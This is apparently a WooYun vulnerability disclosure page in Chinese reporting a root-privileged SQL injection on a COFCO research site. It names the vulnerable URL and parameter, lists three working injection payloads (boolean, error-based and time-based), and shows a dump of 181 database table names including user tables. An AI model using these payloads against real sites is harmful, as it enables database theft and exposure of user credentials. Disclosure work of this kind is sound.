当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131354

漏洞标题:中粮某站存在root权限SQL注入(可脱库)

相关厂商:中粮集团有限公司

漏洞作者: littelfire

提交时间:2015-08-03 17:28

修复时间:2015-09-17 18:52

公开时间:2015-09-17 18:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

rt

详细说明:

中粮营养健康研究院存在root权限sql注入漏洞,可脱库获取大量用户和密码相关的敏感信息

漏洞证明:

注入地址:http://c3.cofco.com/online_check.php?uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988
注入点为:app

Parameter: app (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' AND 9435=9435 AND 'pqLB'='pqLB
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(0x716b766271,(SELECT (ELT(3794=3794,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'snyA'='snyA
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT * FROM (SELECT(SLEEP(5)))Xddd) AND 'WjQq'='WjQq


注入是root用户dba权限

3.jpg


跑出了用户的密码

2.jpg


跑了一下dbs

4.jpg


当前库为:project_cofco
库内有181个表

1.jpg


+------------------------------+
| qm_activity |
| qm_activity_category |
| qm_activity_dimensions |
| qm_activity_dimensions_score |
| qm_activity_expert_score |
| qm_activity_user_link |
| qm_activity_user_rater_link |
| qm_app |
| qm_app_tag |
| qm_atme |
| qm_attach |
| qm_birthday_count |
| qm_blog |
| qm_blog_category |
| qm_blog_view_temp |
| qm_blogger |
| qm_calendar |
| qm_calendar_big_event |
| qm_calendar_big_event_url |
| qm_calendar_collection |
| qm_calendar_event |
| qm_calendar_setcache |
| qm_calendar_share |
| qm_calendar_story |
| qm_clean_cache |
| qm_collection |
| qm_comment |
| qm_contact_user |
| qm_credit_node |
| qm_credit_user |
| qm_denounce |
| qm_department |
| qm_device_token |
| qm_expert_action |
| qm_expert_action_dimensions |
| qm_expert_action_rater_link |
| qm_expert_action_user_link |
| qm_expert_category |
| qm_expert_category_link |
| qm_expert_dimensions |
| qm_expert_score |
| qm_expression |
| qm_feed |
| qm_feed_data |
| qm_feed_node |
| qm_feedback |
| qm_feedback_type |
| qm_holidays |
| qm_interface_log |
| qm_invite_code |
| qm_invite_record |
| qm_ioffice_leave |
| qm_ioffice_leave_count |
| qm_ioffice_leave_uid_link |
| qm_ioffice_log |
| qm_ioffice_user_days |
| qm_ioffice_user_log |
| qm_lang |
| qm_log_comment |
| qm_login |
| qm_login_record |
| qm_manage_user |
| qm_medal |
| qm_message_content |
| qm_message_list |
| qm_message_member |
| qm_navi |
| qm_news |
| qm_news_category |
| qm_news_category_user_link |
| qm_news_log |
| qm_notice_pushlist |
| qm_notify_email |
| qm_notify_email_list |
| qm_notify_message |
| qm_notify_node |
| qm_oauth_token |
| qm_online |
| qm_online_logs |
| qm_online_logs_bak |
| qm_online_stats |
| qm_open_notify |
| qm_open_weibo_login |
| qm_permission_group |
| qm_permission_node |
| qm_portal_channel |
| qm_portal_node |
| qm_portal_page |
| qm_present |
| qm_present_record |
| qm_profile_bookmaking |
| qm_profile_confraternity |
| qm_profile_education |
| qm_profile_profession |
| qm_profile_work |
| qm_province_city |
| qm_recent_view |
| qm_resource |
| qm_resource_attr |
| qm_resource_member |
| qm_resource_order |
| qm_resource_order_user |
| qm_resource_user_star |
| qm_schedule |
| qm_search |
| qm_search_key |
| qm_search_select |
| qm_share_record |
| qm_sina |
| qm_subject |
| qm_subject_part |
| qm_subject_province |
| qm_summary_info |
| qm_system_data |
| qm_tag |
| qm_task |
| qm_task_log |
| qm_team |
| qm_team_album |
| qm_team_article |
| qm_team_attach |
| qm_team_category |
| qm_team_category_link |
| qm_team_count |
| qm_team_feed |
| qm_team_file |
| qm_team_forum_post |
| qm_team_forum_topic |
| qm_team_log |
| qm_team_member |
| qm_team_photo |
| qm_team_plug |
| qm_team_plug_init |
| qm_team_plug_mod |
| qm_team_plug_mod_init |
| qm_team_theme |
| qm_team_topic |
| qm_team_topic_link |
| qm_team_visit |
| qm_team_x_category |
| qm_timeline |
| qm_tips |
| qm_topic |
| qm_topic_highlight |
| qm_topic_link |
| qm_url |
| qm_user |
| qm_user_app |
| qm_user_attention |
| qm_user_blacklist |
| qm_user_count |
| qm_user_credit_history |
| qm_user_data |
| qm_user_department |
| qm_user_follow |
| qm_user_follow_group |
| qm_user_follow_group_link |
| qm_user_group |
| qm_user_group_link |
| qm_user_medal |
| qm_user_online |
| qm_user_privacy |
| qm_user_profile |
| qm_user_profile_setting |
| qm_user_special |
| qm_user_verify |
| qm_visit |
| qm_widget |
| qm_widget_diy |
| qm_widget_user |
| qm_wiki |
| qm_wiki_category |
| qm_wiki_category_link |
| qm_wiki_history |
| qm_wx |
| qm_x_article |
| qm_x_logs |
| qm_x_logs_2013_10 |
| qm_x_vote |
| qm_x_vote_opt |
| qm_x_vote_user |
+------------------------------+


跑了一下qm_user表的数字做了一下验证

5.jpg


6.jpg

修复方案:

做好过滤。

版权声明:转载请注明来源 littelfire@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-03 18:51

厂商回复:

非常感谢您的支持!

最新状态:

暂无